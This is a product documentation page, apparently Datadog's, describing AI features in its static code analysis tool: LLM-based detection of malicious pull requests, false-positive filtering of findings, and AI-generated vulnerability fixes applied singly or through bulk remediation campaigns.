AI-Enhanced Static Code Analysis
This product is not supported for your selected
Datadog site. (
).
Static Code Analysis (SAST) uses AI to help automate detection, validation, and remediation across the vulnerability management lifecycle.
This page provides an overview of these features.
Summary of AI features in SAST
| Step of vulnerability management lifecycle | Feature | Trigger Point | Impact |
|---|
| Detection | Malicious PR protection: Detect potentially malicious changes or suspicious diffs | At PR time | Flags PRs introducing novel risky code |
| Validation | False positive filtering: Deprioritize low-likelihood findings | After scan | Reduce noise, allow focus on actual issues |
| Remediation | Batched remediation: Generate suggested fixes (and optionally PRs) for one or multiple vulnerabilities | After scan | Reduces developer effort, accelerates fix cycle |
Detection
Join the Preview!
Malicious PR protection is in Preview and supports GitHub repositories only. Click Request Access and complete the form.
Request AccessMalicious PR protection uses LLMs to detect and prevent malicious code changes at scale. By scanning pull requests (PRs) submitted to the default branches of your repositories to detect potentially malicious intent, this functionality helps you:
- Secure code changes from both internal and external contributors
- Scale your code reviews as the volume of AI-assisted code changes increases
- Embed code security into your security incident response workflows
Detection coverage
Malicious code changes come in many different forms. Datadog SAST covers attack vectors such as:
- Malicious code injection
- Attempted secret exfiltration
- Pushing of malicious packages
- CI workflow compromise
Examples include the tj-actions/changed-files breach (March 2025) and obfuscation of malicious code in npm packages (September 2025). Read more in the blog post here.
Search and filter results
Detections from Datadog SAST on potentially malicious PRs can be found in Security Signals from the rule ID def-000-wnp.
There are two potential verdicts: malicious and benign. They can be filtered for using:
@malicious_pr_protection.scan.verdict:malicious@malicious_pr_protection.scan.verdict:benign.
Signals can be triaged directly in Datadog (assign, create a case, or declare an incident), or routed externally using Datadog Workflow Automation.
Validation and triage
False positive filtering
For a subset of SAST vulnerabilities, Bits AI reviews the context of the finding and assesses whether it is more likely to be a true or false positive, along with a short explanation of the reasoning.
To narrow down your initial list for triage, in Vulnerabilities, select Filter out false positives. This option uses the -bitsAssessment:"False Positive" query.
Each finding includes a section with an explanation of the assessment. You can provide Bits AI with feedback on its assessment using a thumbs up 👍 or thumbs down 👎.
False positive filtering is supported for the following CWEs:
Join the Preview!
AI-suggested remediation for SAST is powered by the Bits AI Dev Agent and is in Preview. To sign up, click Request Access and complete the form.
Request AccessDatadog SAST uses the Bits AI Dev Agent to generate code fixes for vulnerabilities. You can remediate individual vulnerabilities or fix multiple vulnerabilities using bulk remediation campaigns.
To view and remediate vulnerabilities:
In Datadog, navigate to Security > Code Security > Vulnerabilities, and select Static Code (SAST) on the left sidebar.
Select a vulnerability to open a side panel with details about the finding and the affected code.
In the Next Steps > Remediation section, click Fix with Bits.
Single fix
Use Single fix to open a code session for Bits AI to fix this single vulnerability. You can review the proposed diff, ask follow-up questions, edit the patch, and create a pull request to apply the remediation to your source code repository.
Bulk fix (campaigns)
Use Bulk fix to create a remediation campaign that fixes multiple vulnerabilities at the same time.
Selecting this option opens a Create a new Bits AI Bulk Fix Campaign modal where you can configure the following:
- Campaign title: A descriptive title for your campaign.
- Repositories: The repositories and paths you want Bits AI to scan.
- PR grouping options: How Bits AI should group findings into pull requests (for example, one PR per repository, file, or finding). You can also limit the number of open PRs and the number of findings per PR.
- Custom instructions (optional): Additional guidance for how Bits AI should generate fixes, such as changelog requirements or pull request title formatting.
After you create a campaign, Bits AI Dev Agent loads the in-scope findings, generates patches based on your grouping rules, and (if enabled) creates pull requests. You can review and edit each session before merging changes.
- Automatic PR creation is disabled by default. Enable it in Settings.
- Campaigns do not track fixes created outside the campaign. If you generate a single fix and later create a campaign, Bits AI may generate the same fix again.
View campaign progress
To view all campaigns, navigate to Bits AI > Dev Agent > Code Sessions > Campaigns.
Click a campaign to view details including session status, pull requests by repository, and remediated findings. You can click on individual sessions to review, edit, and merge fixes with the Bits AI Dev Agent.
Each code session shows the life cycle of an AI-generated fix so you can review and validate changes before merging. It includes:
- The original security finding and proposed code change
- An explanation of how and why the AI generated the fix
- CI results (if enabled) to validate the patch is safe to deploy
- Options to refine the fix or Create PR to apply the changes to your source code repository
To open the remediation session, select the vulnerability from the Vulnerabilities page to open the side panel, scroll to the Remediation section, and select Expand & Chat.
You can also navigate to remediation sessions through the Campaigns and Code Sessions views.
Further reading
Additional helpful documentation, links, and articles: